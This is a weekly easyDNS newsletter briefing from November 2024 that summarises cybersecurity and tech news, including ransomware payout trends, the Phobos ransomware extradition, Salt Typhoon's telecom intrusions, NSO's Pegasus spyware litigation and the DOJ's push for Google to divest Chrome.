This is your easyDNS #AxisOfEasy Briefing for the week of November 18th, 2024 our Technology Correspondent Joann L Barnes and easyCEO Mark E. Jeftovic send out a short briefing on the state of the ‘net and how it affects your business, security and privacy.

To Listen/watch this podcast edition with commentary and insight from Joey Tweets, and Len the Lengend click here.

In this issue: 

• The Rising Cost of Ransomware Payouts Predicted to Reach 113 Million
• Justice Department Targets Google Chrome in Landmark Antitrust Case
• International Justice Brings Phobos Ransomware Mastermind to Trial
• T-Mobile and Telecom Giants Targeted in Sophisticated Chinese Cyber Attack
• WhatsApp Accuses NSO of Direct Role in Spyware Operations

Elsewhere Online:

• Water Barghest: The Five-Year Cybercrime Operation Exploiting IoT Devices for Profit
• Cybersecurity Crisis Looms Over US Drinking Water Infrastructure
• Ubuntu Security Flaws Leave Systems Open to Attack
• Palo Alto Addresses Zero-Day Flaws Used in Operation Lunar Peek
• Senator highlights deadline for TikTok divestment under US law

The Rising Cost of Ransomware Payouts Predicted to Reach 113 Million

Ransomware attacks are escalating, with payouts projected to surpass $113 million in 2024. LockBit, responsible for 44% of global ransomware incidents from January to September 2023, has emerged as a dominant player, demanding millions in ransoms. U.S. banks reported $1.2 billion in ransomware-related payments in 2021, while healthcare remains especially vulnerable, suffering 33 breaches in August 2023 alone, affecting 673,934 individuals. Notable incidents include the Pacific Alliance Medical Center’s breach, compromising data on 266,133 patients, and CNA Financial’s $40 million payout in 2021. Average recovery costs for healthcare breaches hit $10.1 million per incident.

Ransom demands continue to rise; the 2023 average reached $4 million, with peaks of $35 million. Smaller organizations are disproportionately targeted, with over 75% of attacks hitting firms with under 1,000 employees. The FBI logged 3,729 ransomware complaints in 2021, causing $49.2 million in losses. These attacks often exploit DNS vulnerabilities, a vector in 91% of cyberattacks.

Despite the rising threat, only 10% of large companies are expected to adopt zero-trust cybersecurity frameworks by 2026. To combat ransomware, organizations must deploy multi-layered defenses, train employees, segment networks, and prioritize advanced DNS security, highlighting the ever-evolving battle against increasingly bold and sophisticated cybercriminal operations.

Read: https://domainsure.com/articles/avoid-paying-hackers-ransomware-payouts-could-triple-last-years-total-to-over-113m-in-2024/

Justice Department Targets Google Chrome in Landmark Antitrust Case

The Justice Department, alongside several states, is escalating antitrust actions against Google, proposing the divestiture of its Chrome browser following Judge Amit Mehta’s August ruling that Google unlawfully monopolized the search market. Chrome, controlling 61% of the U.S. browser market, is pivotal to Google’s dominance, enabling extensive user data collection that drives its advertising revenue. Chrome also integrates with Gemini, Google’s AI product, steering users toward its web assistant capabilities and cementing its ecosystem.

The department seeks broader remedies targeting Google’s artificial intelligence initiatives and the Android operating system. While officials considered requiring Google to sell Android, they rejected this as overly severe. Instead, they propose licensing Google’s search data and results to competitors and granting websites greater control to shield content from Google’s AI exploitation. These proposals aim to dismantle barriers to competition and will be presented to Judge Mehta on Wednesday.

This case, initiated under the Trump administration and sustained by the Biden administration, is the most aggressive antitrust challenge since the Microsoft case two decades ago. Over recent months, government attorneys consulted numerous companies to refine their recommendations. A forced Chrome divestiture, however, hinges on identifying a suitable buyer, complicating the enforcement of these landmark measures.

Read: https://reclaimthenet.org/justice-department-google-chrome-antitrust-sell

International Justice Brings Phobos Ransomware Mastermind to Trial

The U.S. has extradited Evgenii Ptitsyn, a 42-year-old Russian, from South Korea to face charges in Maryland for his alleged role as a key administrator of the Phobos ransomware operation. Since joining Phobos in 2020, Ptitsyn is accused of orchestrating its sale, distribution, and use, enabling affiliates to extort over $16 million globally. Phobos ransomware, distributed via cybercrime forums, was advertised for free, but affiliates paid $300 per decryption key to unlock stolen data. Evidence includes cryptocurrency transactions tied to Ptitsyn’s wallet.

Victims included a Maryland-based accounting firm serving federal agencies, Maryland healthcare providers, a New York law enforcement union, an Illinois contractor for the U.S. Departments of Defense and Energy, and a North Carolina children’s hospital. Ransoms ranged from $12,000 to $300,000, with one Maryland healthcare provider paying $2,300 for a decryption key. Phobos’s impact extends beyond Ptitsyn, as other cybercrime groups like 8Base have leveraged its capabilities.

Ptitsyn faces charges including wire fraud, conspiracy, computer fraud, and extortion, carrying potential decades-long prison sentences. His extradition highlights global law enforcement collaboration, with agencies from South Korea, Japan, Europe, and the U.S. working together. His November 4 court appearance in Maryland marks a pivotal moment in international cybercrime prosecution.

Read: https://techcrunch.com/2024/11/19/us-extradites-russian-accused-of-extorting-millions-in-phobos-ransomware-payments/

T-Mobile and Telecom Giants Targeted in Sophisticated Chinese Cyber Attack

T-Mobile confirmed it was targeted by Salt Typhoon, a Chinese cyberespionage group also known as Earth Estries, FamousSparrow, GhostEmperor, and UNC2286, in a months-long campaign to harvest sensitive cellphone communications from high-value intelligence targets. Joining AT&T, Verizon, and Lumen Technologies in the crosshairs, T-Mobile stated there was no significant impact on its systems or evidence of customer data breaches. This attack is part of a broader campaign linked to PRC-affiliated actors, who, according to U.S. government reports, infiltrated telecom networks to steal call records, compromise communications involving political and governmental figures, and access sensitive law enforcement data.

Salt Typhoon, active since 2020, has targeted entities across the Philippines, Taiwan, Malaysia, South Africa, Germany, and the U.S. They exploit external vulnerabilities, using tools like Cobalt Strike, TrillClient, SparrowDoor variants, and bespoke malware to achieve persistence. Methods include lateral movement with PSExec, credential theft via web browsers, and exfiltration using anonymized file-sharing services and cURL. The group also repurposed proxy servers to disguise traffic to command-and-control servers.

Trend Micro highlights their advanced, adaptable tradecraft, including the use of Microsoft Exchange exploits to deploy tools like China Chopper and Zingdoor. Salt Typhoon’s campaigns underscore the evolving threat of state-backed infiltration targeting critical infrastructure globally.

Read: https://thehackernews.com/2024/11/chinese-hackers-exploit-t-mobile-and.html

WhatsApp Accuses NSO of Direct Role in Spyware Operations

The Israeli NSO Group faces intense scrutiny over its Pegasus spyware, accused of targeting journalists, activists, and dissidents via unauthorized WhatsApp access. WhatsApp’s 2019 lawsuit revealed Pegasus was distributed to 1,400 devices using WhatsApp servers. New filings allege NSO directly installed and operated Pegasus, leaving clients with minimal involvement: entering a phone number and awaiting installation. WhatsApp claims NSO monitored misuse, even disconnecting ten clients for excessive abuse, contradicting NSO’s insistence that customers solely operate the spyware.

NSO allegedly exploited WhatsApp security via tools like Heaven, Eden, and Erised to infiltrate devices. Even after WhatsApp’s lawsuit and countermeasures, NSO allegedly persisted, bypassing blocks and developing new tools to distribute Pegasus. The spyware’s capabilities—stealthily extracting messages, passwords, and location data—fuel its use by authoritarian regimes, raising ethical concerns despite NSO’s claim of exclusively serving legitimate government purposes.

A 2021 database leak exposed Pegasus’s use against 50,000 targets, leading to the US blacklisting NSO and severely curtailing its operations. The case reflects a burgeoning spyware market, with NSO and similar vendors responsible for nearly half of all zero-day exploits since 2014, per Google. Broader industry concerns include Apple’s 2021 lawsuit withdrawal to prevent revealing sensitive counter-surveillance methods in court. The litigation encapsulates spyware’s ethical and legal challenges.

Read: https://www.darkreading.com/endpoint-security/whatsapp-nso-group-operates-pegasus-spyware

Elsewhere Online:

Water Barghest: The Five-Year Cybercrime Operation Exploiting IoT Devices for Profit
Read: https://www.darkreading.com/cloud-security/water-barghest-sells-hijacked-iot-devices-proxy-botnet-misuse

Cybersecurity Crisis Looms Over US Drinking Water Infrastructure
Read: https://hackread.com/cybersecurity-flaws-us-drinking-water-systems-risks/

Ubuntu Security Flaws Leave Systems Open to Attack
Read: https://www.infosecurity-magazine.com/news/5-privilege-escalation-flaws/

Palo Alto Addresses Zero-Day Flaws Used in Operation Lunar Peek
Read: https://www.securityweek.com/palo-alto-patches-firewall-zero-day-exploited-in-operation-lunar-peek/

Senator highlights deadline for TikTok divestment under US law
Read: https://www.reuters.com/world/us/senator-says-trump-cannot-ignore-law-requiring-bytedance-divest-tiktok-by-next-2024-11-19/